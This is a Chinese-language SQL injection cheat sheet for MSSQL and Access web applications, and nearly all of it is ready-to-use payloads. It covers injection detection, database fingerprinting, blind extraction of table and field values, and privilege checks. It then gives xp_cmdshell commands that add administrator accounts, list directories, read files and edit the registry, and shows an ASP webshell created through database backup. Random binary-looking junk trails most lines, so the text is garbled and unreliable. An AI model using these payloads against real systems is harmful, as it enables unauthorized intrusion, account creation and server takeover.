1.判断是否有注入;and 1=1 ;and 1=2 �/a-�OB��U
2.初步判断是否是mssql ;and user>0 V�?C�a�[��
$��=!_ !tr
3.注入参数是字符'and [查询条件] and ''=' OLJ|�gunA#
!y;��xt�?
4.搜索时没过滤参数的'and [查询条件] and '%25'=' vcp[$-$QGJ
G��$i�C@,/
5.判断数据库系统 l !R >I7�
78z�wu<E�T
;and (select count(*) from sysobjects)>0 mssql D�89�(u.�h
PAjH*5I��A
;and (select count(*) from msysobjects)>0 access 0e~4(2��xK
Q$S|�L���C
RZ9c��hTX/
\avgX��ndI
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Qvhy9C�r;�
nxx&aq(._
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 J+nUxF;�EE
��y}>�bJ:�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 x)2ZbIDB:"
MM�/�D��5g
9.(1)猜字段的ascii值(access) ���sT�z��t
";�/,�FUJJ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 k��
3��oR:
��;LFs.Jc<
(2)猜字段的ascii值(mssql) y�ex�0rnQ|
>KC�nm�i��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 F��J�
V!B&
}��woN���I
10.测试权限结构(mssql) .�5YW�>P�V
5cSqo{|En�
5�m���a(~5
�}Lb[`H,}A
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ~�i9'9PHX@
�uKp�Wb1�(
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- O�R�-�fC��
C�DD��Om8
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- E<4'4)FHuQ
gY!#��=?/S
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,g�bQq�oLV
#s��]`�jdc
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �H.s:a#l?
+m1y#�|�08
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- v�^Pj�vv�=
M��N. $a9m
;and 1=(select IS_MEMBER('db_owner'));-- r|�0wIpi6Q
�F��*/J`l�
�=b�l�6:��
#B��wkbOgr
11.添加mssql和系统的帐户 eQ eucmQd{
aiwK�k�f`\
;exec master.dbo.sp_addlogin username;-- J4^�a��D;j
;exec master.dbo.sp_password null,username,password;-- �\~�@a/��J
�De:| T8&�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- HF]|>1�WV[
}>�~�]�q)]
;exec master.dbo.xp_cmdshell 'net user username password LRmH�@-�qP
}SBp�c{ch�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ��^@��n?&�
nv2p&�-�e+
;exec master.dbo.xp_cmdshell 'net user username password /add';-- � Y.v. EZ
xa|/P#���q
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- %Ig3�udcY?
IO]%AL(�.;
+OX:T) 4h6
z�!:%H�bh=
12.(1)遍历目录 m?�pm�)w
<aGfQg|554
;create table dirs(paths varchar(100), id int) !��p��|d[�
�<gbm
1iEe
;insert dirs exec master.dbo.xp_dirtree 'c:\' �YgW 50)q^
9w( Wtw��'
;and (select top 1 paths from dirs)>0 gOKF%Ej31T
T9O3$1eqfo
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) _� -C{�:rV
Jde@T����h
E)u�trO� R
��a+� lGN�
(2)遍历目录 �I<�^&�~==
%cFqD
&��6
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- O7D6�1~G]
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ntt:>j$��
�gj-Mk�eI)
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 sA�fNu�~d�
"Y�ePd�*�W
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 kB $?A8Olu
�&3%�V�%_�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 MY"���8!��
eg
�Zb�)pP
�4�vb�tB2�
LP-�_i}Kq
13.mssql中的存储过程 �/D&7 \�3}
�6�8-2E�Wq
xp_regenumvalues 注册表根键, 子键 l#k&&rI5x.
'n4$dv%��q
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 X�4Y!Z/b��
�}�0z]�sYI
xp_regread 根键,子键,键值名 �t�}�q�\�.
kKE�s >a��
;exec xp_regread s�2i�xiv�=
On4tK�\l�@
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 TIre,s�)_�
Tkf
J�C�|6
xp_regwrite 根键,子键, 值名, 值类型, 值 �k@/s-^ry3
�eY#_!{*Wn
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
X6<%SJ��C
*w�D| e�K7
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 x��Y94���v
OX[�pK_:`l
xp_regdeletevalue 根键,子键,值名 /yNL�FL�"�
}hyl)?*�~�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 0s'H(qE,�_
( !=^�(Nd�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 mx;1'!�'fr
GFp��pcL@a
Tq�*K
=^�
o"-�*,:Q�e
14.mssql的backup创建webshell ��pZaO�d;t
=#|K�-X0d=
use model ~s4o1^6L��
3�C7}�V{�?
create table cmd(str image); J2��d�3�&6
P!K�;`4Ika
insert into cmd(str) values (''); W2W4�w��
�mKN#dmw6
backup database model to disk='c:\l.asp'; N�!iu�gG�L
4%9�
+="�
1�DT}_0{0Q
�X4��{O/G
15.mssql内置函数 *
j]"I=D��
���2�GC{+*
;and (select @@version)>0 获得Windows的版本号 '|^<|S_+�K
nh�t�?��58
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 2~�(�\d\k�
[+�4/M3J%
;and (select user_name())>0 爆当前系统的连接用户 $++SF)G1]_
rI.CCPY~s�
;and (select db_name())>0 得到当前连接的数据库 HyKv5��S$
h#�Q Sx@U6
>hsvRX\_�`
l���Z�f�=#
16.简洁的webshell 1K&l}/zU�l
���_,{R3k�
use model u#r[JF9L�P
S"skKh4�w
create table cmd(str image); ~!�[J~CkPS
�F�vVR� \a
insert into cmd(str) values (''); 7;x}�W-`iF
�%MH!�L2|�
backup database model to disk='g:\wwwtest\l.asp';
